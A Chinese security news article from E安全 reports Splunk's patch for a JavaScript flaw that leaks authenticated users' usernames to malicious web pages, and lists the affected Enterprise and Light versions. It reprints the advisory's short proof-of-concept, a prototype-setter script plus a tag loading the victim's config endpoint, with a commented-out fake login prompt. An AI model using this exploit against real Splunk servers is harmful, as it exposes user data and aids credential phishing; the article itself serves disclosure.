E安全4月3日讯 Splunk近日发布了一项安全补丁，修复其JavaScript代码泄露用户信息的问题。

什么是Splunk?    

Splunk 是机器数据的引擎。使用 Splunk 可收集、索引和利用所有应用程序、服务器和设备（物理、虚拟和云中）生成的快速移动型计算机数据 。从一个位置搜索并分析所有实时和历史数据。 使用 Splunking 处理计算机数据，可让您在几分钟内（而不是几个小时或几天）解决问题和调查安全事件。监视您的端对端基础结构，避免服务性能降低或中断。以较低成本满足合规性要求。关联并分析跨越多个系统的复杂事件。获取新层次的运营可见性以及 IT 和业务智能。
   

其在全面当中解释称，如果攻击者诱导已经完成身份验证的用户访问某恶意网页，则后者的个人信息即可遭到泄露。

无论用户是否启用远程访问功能，这项漏洞都仅会泄露用户的用户名称，但这一信息已经足以允许攻击者尝试利用后续的网络钓鱼攻击获取更多用户凭证。

建议报告指出，这项bug源自Splunk在其Object原型在JavaScript中的使用方式。

以下为建议报告中给出的Poc概念验证过程：

<script>
Object.defineProperty（Object.prototype，“$ C”，{set：function（val）{
   // prompt（“Splunk Timed out：\ nPlease Login to Splunk \ nUsername：
”+ val.USERNAME，“Password” ）
for（var i in val）{
 alert（“”+ i +“”+ val [i]）;
  }
 }
}）;
</ script>

<script src =“https：// VICTIM-IP：8000 / en-US / config？autoload = 1”type =“text / javascript”>
</ script>

这项问题会影响到Spunk Enterprise版本6.5.x当中6.5.3之前的各版本、6.4.x当中6.4.6之前的各版本、6.3.x当中6.3.10之前的各版本、6.2.x当中6.2.13.1之前的各版本、6.1.x当中6.1.13之前的各版本、6.0.x当中6.0.14之前的各版本、5.0.x当中5.0.18之前的各版本以及Splunk Light的6.5.2之前的各版本。目前该公司已经针对以上全部版本发布的修复补丁。

补丁地址：

E安全注：本文系E安全独家编译报道，转载请联系授权，并保留出处与链接，不得删减内容。联系方式：① 微信号zhu-geliang ②邮箱eapp@easyaq.com
@E安全，最专业的前沿网络安全媒体和产业服务平台，每日提供优质全球网络安全资讯与深度思考，欢迎关注微信公众号「E安全」（EAQapp），或登E安全门户网站www.easyaq.com , 查看更多精彩内容。